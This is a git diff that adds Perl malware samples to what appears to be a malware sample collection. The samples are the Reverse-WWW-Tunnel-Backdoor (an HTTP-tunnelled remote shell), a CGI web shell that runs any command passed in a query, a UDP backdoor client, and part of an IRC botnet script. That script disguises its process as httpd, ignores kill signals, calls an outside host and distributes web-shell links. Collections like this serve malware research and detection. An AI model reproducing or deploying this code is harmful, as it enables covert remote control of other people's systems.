OpenBSD 2.2 can't recv here! can't get any data! sucks ... + recv (THC, $readin, 16386, 0) || undef $error; +# if ((! $error) and (! $BROKEN_RECV)) { goto OK; } + print STDERR "!" if $DEBUG; + goto OK if (($readin eq "\000") or ($readin eq "\n") + or ($readin eq "")); + $input = $input . $readin; +# } +OK: print STDERR "\nall data read, entering OK\n" if $DEBUG; + print STDERR "RECEIVE: $input\n" if $DEBUG; + $input =~ s/.*\r\n\r\n//s; + print STDERR "BEFORE DECODING: $input\n" if $DEBUG; + &uudecode; # decoding the data from the master + print STDERR "AFTER DECODING: $decoded\n" if $DEBUG; + print STDERR "if password not found -> exit\n" if $DEBUG; + goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0); + $decoded =~ s/^$PASSWORD//; + print STDERR "writing input data to $SHELL\n" if $DEBUG; + print W_IN "$decoded" || goto END_IT; # sending the data + sleep(1); # to the shell proc. + print STDERR "jumping to GO\n" if $DEBUG; + goto GO; + } +END_IT: kill 9, $pid; $pid = 0; + exit(0); +} # END OF SLAVE FUNCTION + +############### MASTER FUNCTION ############### + +sub master { + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; + listen(THC, 3) || die "can't listen\n"; # print the HELP + print STDOUT ' +Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ... + +Introduction: Wait for your SLAVE to connect, examine it\'s output and then + type in your commands to execute on SLAVE. You\'ll have to + wait min. the set $DELAY seconds before you get the output + and can execute the next stuff. Use ";" for multiple commands. + Trying to execute interactive commands may give you headache + so beware. Your SLAVE may hang until the daily connect try + (if set - otherwise you lost). + You also shouldn\'t try to view binary data too ;-) + "echo bla >> file", "cat >> file <<- EOF", sed etc. are your + friends if you don\'t like using vi in a delayed line mode ;-) + To exit this program on any time without doing harm to either + MASTER or SLAVE just press Control-C. + Now have fun. +'; + +YOP: print STDOUT "\nWaiting for connect ..."; + $remote=accept (S, THC) || goto YOP; # get the connection + ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE + $slave=gethostbyaddr($r_slave, AF_INET); # data. + $slave="unresolved" if ($slave eq ""); + print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; + select S; $|=1; + select STDOUT; $|=1; + $input = ""; + vec($socks, fileno(S), 1) = 1; + $error="no"; +# while (1) { # read the data sent by the slave + while (! select($r = $socks, undef, undef, 0.00001)) {} + recv (S, $readin, 16386, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { + print STDOUT "[disconnected]\n"; + } +# $readin =~ s/\r//g; +# $input = $input . $readin; +# last if ( $input =~ m/\r\n\r\n/s ); + $input = $readin; + print STDERR "MASTER RECEIVE: $input\n" if $DEBUG; +# } + &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); + if ( $input =~ m/^GET /s ) { + $input =~ s/^.*($CGI_PREFIX)\??//s; + $input =~ s/\r\n.*$//s; + } else { if ( $input =~ m/^POST /s ) { + $input =~ s/^.*\r\n\r\n//s; + } else { if ( $input =~ m/^HEAD /s ) { + &hide_as_broken_webserver; + } else { + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; + } } } + print STDERR "BEFORE DECODING: $input\n" if $DEBUG; + &uudecode; # decoding the data from the slave + &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); + $decoded =~ s/^$PASSWORD//s; + $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); + print STDOUT "$decoded"; # showing the slave output to the user + $output = ; # and get his input. + &uuencode; # encode the data for the slave + $encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n"; + send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it + close (S); + print STDOUT "sent.\n"; + goto YOP; # wait for the next connect from the slave +} # END OF MASTER FUNCTION + +###################### MISC. FUNCTIONS ##################### + +sub uuencode { # does the encoding stuff for error-free data transfer via WWW + $output = $PASSWORD . $output; # PW is for error checking and + $uuencoded = pack "u", "$output"; # preventing sysadmins from + $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird + /'zcadefghjklmnopqrstuv' # data. No real + /; # security! + $uuencoded =~ tr/"'"/'b'/; + if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb + $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; + $cut_length = 4099 - (length $REAL_PREFIX); + $uuencoded = pack "a$cut_length", $uuencoded + if ($codelength > 4111); + } + $encoded = $uuencoded; +} # END OF UUENCODE FUNCTION + +sub uudecode { # does the decoding of the data stream + $input =~ tr/'zcadefghjklmnopqrstuv' + /'\n)=(:;&><,#$*%]!\@"`\\\-' + /; + $input =~ tr/'b'/"'"/; + $decoded = unpack "u", "$input"; +} # END OF UUDECODE FUNCTION + +sub base64encoding { # does the base64 encoding for proxy passwords + $encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD; + $encoded_string = substr(pack('u', $encode_string), 1); + chomp($encoded_string); + $encoded_string =~ tr|` -_|AA-Za-z0-9+/|; + $padding = (3 - length($encode_string) % 3) % 3; + $encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding; + $PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n"; +} # END OF BASE64ENCODING FUNCTION + +sub hide_as_broken_webserver { # invalid request -> look like broken server + send (S, "\r\n404 File Not Found\r\n". + "\r\n

File Not Found

\r\n\r\n", 0); + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; +} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION + +# END OF PROGRAM # (c) 1998-2002 by diff --git a/Perl/Backdoor.Perl.AEI.a b/Perl/Backdoor.Perl.AEI.a new file mode 100644 index 00000000..71c5262f --- /dev/null +++ b/Perl/Backdoor.Perl.AEI.a @@ -0,0 +1,334 @@ +# +# Reverse-WWW-Tunnel-Backdoor v1.6 +# (c) 1998 by van Hauser / [THC] - The Hacker's Choice +# Check out http://r3wt.base.org for updates +# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls" +# available at the website above in the "Articles" section. +# + +# Greets to all THC, ADM, arF and #bluebox guys + +# verified to work on Linux, Solaris, AIX and OpenBSD + +# BUGS: some Solaris machines: select(3) is broken, won't work there +# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ... +# we can't make proper receive checks here. Workaround implemented. +# +# HISTORY: +# v1.6: included www-proxy authentication ;-)) +# v1.4: porting to various unix types (and I thought perl'd be portable...) +# v1.3: initial public release of the paper including this tool + +# +# GENERAL CONFIG (except for $MASK, everything must be the same +# for MASTER and SLAVE is this section!) +# +$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char! +$MASK="vi"; # for masking the program's process name +$PASSWORD="THC"; # anything, nothing you have to rememeber + # (not a real "password" anyway) +# +# MASTER CONFIG (specific for the MASTER) +# +$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080) +$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!) + +# +# SLAVE CONFIG (specific for the SLAVE) +# +$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh) +$DELAY="3"; # time to wait for output after your command(s) +#$TIME="00:01"; # time when to connect to the master (unset if now) +#$DAILY="yes"; # tries to connect once daily if set with something +#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one +#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one +#$PROXY_USER="user"; # username for proxy authentication +#$PROXY_PASSWORD="pass"; # password for proxy authentication +#$DEBUG=""; # for debugging purpose, turn off when in production +$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris + +# END OF CONFIG # nothing for you to do after this point # + +################## BEGIN MAIN CODE ################## + +require 5.002; +use Socket; + +$|=1; # next line changes our process name +if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; } +undef $DAILY if (! $TIME); +if ( !($PROXY) || !($PROXY_PORT) ) { + undef $PROXY; + undef $PROXY_PORT; +} +$protocol = getprotobyname('tcp'); + +if ($ARGV[0] ne "") { + if ($ARGV[0] eq "-h") { + print STDOUT "no commandline option : daemon mode\n"; + print STDOUT "using \"-h\" as option : this help\n"; + print STDOUT "any other option : slave mode\n"; + exit(0); + } else { + print STDOUT "starting in slave mode\n"; + $SLAVE_MODE = "yeah"; + } +} + +if (! $SLAVE_MODE) { + &master; +} else { + &slave; +} +# END OF MAIN FUNCTION + +############### SLAVE FUNCTION ############### + +sub slave { + $pid = 0; + if ($PROXY) { # setting the real config (for Proxy Support) + $REAL_SERVER = $PROXY; + $REAL_PORT = $PROXY_PORT; + $REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT + . $CGI_PREFIX; + $PROXY_SUFFIX = "Pragma: no-cache\n"; + if ( $PROXY_USER && USER_PASSWORD ) { + &base64encoding; + $PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE; + } + } else { + $REAL_SERVER = $SERVER; + $REAL_PORT = $LISTEN_PORT; + $REAL_PREFIX = "GET " . $CGI_PREFIX; + } +AGAIN: if ($pid) { kill 9, $pid; } + if ($TIME) { # wait until the specified $TIME + $TIME =~ s/^0//; $TIME =~ s/:0/:/; + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" . $min; + while ($TIME ne $t) { + sleep(28); # every 28 seconds we look at the watch + (undef,$min,$hour,undef,undef,undef,undef,undef,undef) + = localtime(time); + $t=$hour . ":" .$min; + } + } + print STDERR "Slave activated\n" if $DEBUG; + if ($DAILY) { # if we must connect daily, we'll + if (fork) { # fork the daily shell process to + sleep(69); # ensure the master control process + goto AGAIN; # won't get stuck by a fucking cmd + } # the user executed. + print STDERR "forked\n" if $DEBUG; + } + $address = inet_aton($REAL_SERVER) || die "can't resolve server\n"; + $remote = sockaddr_in($REAL_PORT, $address); + $forked = 0; +GO: close(THC); + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + if (! $forked) { # fork failed? fuck, let's try again + pipe R_IN, W_IN; select W_IN; $|=1; + pipe R_OUT, W_OUT; select W_OUT; $|=1; + $pid = fork; + if (! defined $pid) { + close THC; + close R_IN; close W_IN; + close R_OUT; close W_OUT; + goto GO; + } + $forked = 1; + } + if (! $pid) { # this is the child process (execs $SHELL) + close R_OUT; close W_IN; close THC; + print STDERR "forking $SHELL in child\n" if $DEBUG; + open STDIN, "<&R_IN"; + open STDOUT, ">&W_OUT"; + open STDERR, ">&W_OUT"; + exec $SHELL || print W_OUT "couldn't spawn $SHELL\n"; + close R_IN; close W_OUT; + exit(0); + } else { # this is the parent (data control + network) + close R_IN; + sleep($DELAY); # we wait $DELAY for the commands to complete + vec($rs, fileno(R_OUT), 1) = 1; + print STDERR "before: allwritten2stdin\n" if $DEBUG; + select($r = $rs, undef, undef, 30); + print STDERR "after : wait for allwritten2stdin\n" if $DEBUG; + sleep(1); # The following readin of the command output + $output = ""; # looks weird. It must be! every system + vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-(( + print STDERR "before: readwhiledatafromstdout\n" if $DEBUG; + while (select($w = $ws, undef, undef, 1)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : readwhiledatafromstdout\n" if $DEBUG; + print STDERR "before: fucksunprob\n" if $DEBUG; + vec($ws, fileno(W_OUT), 1) = 1; + while (! select(undef, $w=$ws, undef, 0.001)) { + read R_OUT, $readout, 1 || last; + $output = $output . $readout; + } + print STDERR "after : fucksunprob\n" if $DEBUG; + print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG; + print W_OUT "\000" || goto ENDE; + print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG; + while (1) { + read R_OUT, $readout, 1 || last; + last if ($readout eq "\000"); + $output = $output . $readout; + } + print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG; + &uuencode; # does the encoding of the shell output + $encoded = $REAL_PREFIX . $encoded; + $encoded = $encoded . $PROXY_SUFFIX if ($PROXY); + $encoded = $encoded . "\n"; + print STDERR "connecting to remote, fail->exit\n" if $DEBUG; + connect(THC, $remote) || goto ENDE; # connect to master + print STDERR "send encoded data, fail->exit\n" if $DEBUG; + send (THC, $encoded, 0) || goto ENDE; # and send data + $input = ""; + vec($rt, fileno(THC), 1) = 1; # wait until master sends reply + print STDERR "before: wait4answerfromremote\n" if $DEBUG; + while (! select($r = $rt, undef, undef, 0.00001)) {} + print STDERR "after : wait4answerfromremote\n" if $DEBUG; + print STDERR "read data from socket until eod\n" if $DEBUG; + $error="no"; + while (1) { # read until EOD (End Of Data) + print STDERR "?" if $DEBUG; + # OpenBSD 2.2 can't recv here! can't get any data! sucks ... + recv (THC, $readin, 1, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { goto OK; } + print STDERR "!" if $DEBUG; + goto OK if (($readin eq "\000") or ($readin eq "\n") + or ($readin eq "")); + $input = $input . $readin; + } +OK: print STDERR "\nall data read, entering OK\n" if $DEBUG; + $input =~ s/\n//gs; + &uudecode; # decoding the data from the master + print STDERR "if password not found -> exit\n" if $DEBUG; + goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0); + $decoded =~ s/^$PASSWORD//; + print STDERR "writing input data to $SHELL\n" if $DEBUG; + print W_IN "$decoded" || goto ENDE; # sending the data + sleep(1); # to the shell proc. + print STDERR "jumping to GO\n" if $DEBUG; + goto GO; + } +ENDE: kill 9, $pid; $pid = 0; + exit(0); +} # END OF SLAVE FUNCTION + +############### MASTER FUNCTION ############### + +sub master { + socket(THC, &PF_INET, &SOCK_STREAM, $protocol) + or die "can't create socket\n"; + setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1); + bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n"; + listen(THC, 3) || die "can't listen\n"; # print the HELP + print STDOUT ' +Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ... + +Introduction: Wait for your SLAVE to connect, examine it\'s output and then + type in your commands to execute on SLAVE. You\'ll have to + wait min. the set $DELAY seconds before you get the output + and can execute the next stuff. Use ";" for multiple commands. + Trying to execute interactive commands may give you headache + so beware. Your SLAVE may hang until the daily connect try + (if set - otherwise you lost). + You also shouldn\'t try to view binary data too ;-) + "echo bla >> file", "cat >> file <<- EOF", sed etc. are your + friends if you don\'t like using vi in a delayed line mode ;-) + To exit this program on any time without doing harm to either + MASTER or SLAVE just press Control-C. + Now have fun. +'; + +YOP: print STDOUT "\nWaiting for connect ..."; + $remote=accept (S, THC) || goto YOP; # get the connection + ($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE + $slave=gethostbyaddr($r_slave, AF_INET); # data. + $slave="unresolved" if ($slave eq ""); + print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n"; + select S; $|=1; + select STDOUT; $|=1; + $input = ""; + vec($socks, fileno(S), 1) = 1; + $error="no"; + while (1) { # read the data sent by the slave + while (! select($r = $socks, undef, undef, 0.00001)) {} + recv (S, $readin, 80, 0) || undef $error; + if ((! $error) and (! $BROKEN_RECV)) { + print STDOUT "[disconnected]\n"; + } + $readin =~ s/\r//g; + $input = $input . $readin; + last if ( $input =~ m/\n\n/s ); + } + &hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 ); + $input =~ s/^.*($CGI_PREFIX)\??//s; + $input =~ s/\n.*$//s; + &uudecode; # decoding the data from the slave + &hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 ); + $decoded =~ s/^$PASSWORD//s; + $decoded = "[Warning! No output from remote!]\n>" if ($decoded eq ""); + print STDOUT "$decoded"; # showing the slave output to the user + $output = ; # and get his input. + &uuencode; # encode the data for the slave + send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it + close (S); + print STDOUT "sent.\n"; + goto YOP; # wait for the next connect from the slave +} # END OF MASTER FUNCTION + +###################### MISC. FUNCTIONS ##################### + +sub uuencode { # does the encoding stuff for error-free data transfer via WWW + $output = $PASSWORD . $output; # PW is for error checking and + $uuencoded = pack "u", "$output"; # preventing sysadmins from + $uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird + /'zcadefghjklmnopqrstuv' # data. No real + /; # security! + $uuencoded =~ tr/"'"/'b'/; + if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb + $codelength = (length $uuencoded) + (length $REAL_PREFIX) +12; + $cut_length = 4099 - (length $REAL_PREFIX); + $uuencoded = pack "a$cut_length", $uuencoded + if ($codelength > 4111); + } + $encoded = $uuencoded; + $encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE); +} # END OF UUENCODE FUNCTION + +sub uudecode { # does the decoding of the data stream + $input =~ tr/'zcadefghjklmnopqrstuv' + /'\n)=(:;&><,#$*%]!\@"`\\\-' + /; + $input =~ tr/'b'/"'"/; + $decoded = unpack "u", "$input"; +} # END OF UUDECODE FUNCTION + +sub base64encoding { # does the base64 encoding for proxy passwords + $encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD; + $encoded_string = substr(pack('u', $encode_string), 1); + chomp($encoded_string); + $encoded_string =~ tr|` -_|AA-Za-z0-9+/|; + $padding = (3 - length($encode_string) % 3) % 3; + $encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding; + $PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n"; +} # END OF BASE64ENCODING FUNCTION + +sub hide_as_broken_webserver { # invalid request -> look like broken server + send (S, "\n404 File Not Found\n". + "\n

File Not Found

\n\n", 0); + close S; + print STDOUT "Warning! Illegal server access!\n"; # report to user + goto YOP; +} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION + +# END OF PROGRAM # (c) 1998 by diff --git a/Perl/Backdoor.Perl.Agent.a b/Perl/Backdoor.Perl.Agent.a new file mode 100644 index 00000000..0496ea30 --- /dev/null +++ b/Perl/Backdoor.Perl.Agent.a @@ -0,0 +1,93 @@ +############################################################ +## Network security team ## +############################################################ +##Coder: Ins ## +############################################################ +##Ob dannom scripte: Eto prostoj shell napisannyj na perle## +############################################################ + +#V celjah nesankcionirovannogo dostupa smeni etot parol`" +#$pwd=''; + +print "Content-type: text/html\n\n"; +&read_param(); +if (!defined$param{dir}){$param{dir}="/"}; +if (!defined$param{cmd}){$param{cmd}="ls -la"}; +##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};## + +print << "[ins1]"; + +::Network Security Team:: +Network security team :: CGI Shell +

+ + + +Vvedite zapros: +
+[ins1] + +print "cd $param{dir}&&$param{cmd}"; + +print << "[ins2]"; +
+Otvet na zapros: +
+[ins2]
+
+#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=){print "$line";};
+close (FILEHANDLE);
+
+print << "[ins3]";
+
+
+DIR dlja sledujushego zaprosa: + +Sledujushij zapros: + + + +
+ + +[ins3] + +sub read_param { +$buffer = "$ENV{'QUERY_STRING'}"; +@pairs = split(/&/, $buffer); +foreach $pair (@pairs) + { + ($name, $value) = split(/=/, $pair); + $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; + $value =~ s/\+/ /g; + $value =~ s/%20/ /g; + $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; + $param{$name} = $value; + } +} + +#########################<>##################################### \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Anarchy b/Perl/Backdoor.Perl.Anarchy new file mode 100644 index 00000000..5058d3a4 --- /dev/null +++ b/Perl/Backdoor.Perl.Anarchy @@ -0,0 +1,48 @@ + +use IO::Socket; +use Getopt::Std; + +getopts('s:p:h', \%opt)||die("Error: Unable to get command line options !!!\n"); + +if(defined($opt{'h'})) { \&usage() } +if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() } +if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() } + + +$|=1; +$maxlen=1024; + +$sock=IO::Socket::INET->new(Proto=>'udp') +or die("Error: Cannot initialize socket !!!\n"); +$ipaddr=inet_aton($server); +$portaddr=sockaddr_in($port, $ipaddr); + + +print("\nAUDP Backdoor started.\n"); +print("======================\n"); + +while(1) { + print("=> "); + $mesg=; + chomp $mesg; + if($mesg=~/^\s*(exit)|(quit)\s*/i) { exit(0) } + if($mesg!~/^\s*$/) { + send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n"); + + while($portaddr=recv($sock, $msg, $maxlen, 0)) { + if($msg=~/^\-end\.$/) { last } else { + print $msg; + } + } + } +} + + + +sub usage() { + print("\nAUDP - Programmed by Anarchy\n"); + print("============================\n"); + print("Usage: AUDP -s -p \n\n"); + exit 1; +} + diff --git a/Perl/Backdoor.Perl.IRCBot.aa b/Perl/Backdoor.Perl.IRCBot.aa new file mode 100644 index 00000000..16f1109f --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.aa @@ -0,0 +1,1905 @@ +#################################### + +use HTTP::Request; +use LWP::UserAgent; +my $processo = 'usr/sbin/httpd'; +my $linas_max='5'; +my $sleep='10'; +my $cmd="http://201.218.196.231/fastspread.txt?"; +my $id="http://201.218.196.231/fastspread.txt?"; +############################################ +my @adms=("chireo"); +my @canais=("#chireox"); +#Put your channel here +my @nickname = ("XB0Tscan-"); +my $nick = $nickname[rand scalar @nickname]; +#Nickname of bot +my $ircname ='ivil'; +chop (my $realname = 'mack'); +#IRC name and Realname +$servidor='irc.indoirc.net' unless $servidor; +my $porta='6667'; +my $exploitcounter = 100; +my @User_Agent = &Agent(); +############################################ +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } +# select(undef, undef, undef, 0.01); #sleeping for a fraction of a second keeps the script from running to 100 cpu usage ^_^ + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 VooDoo\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } +#End of Connect + if ($args =~ /^(\Q$meunick\E|\!x)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!x" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } +######################### End of prefix + elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick|".int rand(999999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal $key"); + } + } +} + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + + if ($funcarg =~ /^killme/) { + sendraw($IRC_cur_socket, "QUIT :"); + $killd = "kill -9 ".fork; + system (`$killd`); + } +###################### +# Commands # +###################### +if ($funcarg =~ /^hello/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] WAZaaaaaaaa !"); +} + +if ($funcarg =~ /^c99/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://no-hack.net/shells/c99.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.topnlpsites.com/images/gif/c99.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.avramovic.info/razno/c99.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://usuarios.lycos.es/lannetboy/shells/c99.txt !"); +} + +if ($funcarg =~ /^r57/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.army5.com.br/r57.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://www.id-nobody.com/shell/r57.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://system-nemesis.us/shell/r57.txt !"); +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo] http://no-hack.net/shells/r57.txt !"); +} +if ($funcarg =~ /^md5 (.*)/) { +$md5=$1; +my @gdataonline=gdataonline($md5); +my @cry=cry($md5); +my @alim=alim($md5); +my @xpz=xpz($md5); +my @rend=rend($md5); +my @ice=ice($md5); + +} + +sub ice(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://ice.breaker.free.fr/md5.php?hash=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/

- (.*?)


/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]ice.breaker.free.fr : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]ice.breaker.free.fr : Hash Not Found."); +} +} + +sub rend(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://md5.rednoize.com/?p&s=md5&q=$md5"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/<(.*)/g){ + $crack = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.rednoize.com : $crack"); +}else{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :[Voo|Doo]md5.rednoize.com : Hash Not Found."); +} +} + + +sub xpz(){ +$hashget = LWP::UserAgent->new; +$resp = $hashget->get("http://md5.xpzone.de/?string=".$md5."&mode=decrypt"); # checks gdata for hash + $hashans = $resp->content; + if ($hashans =~ m/Code: (.*)<\/b>
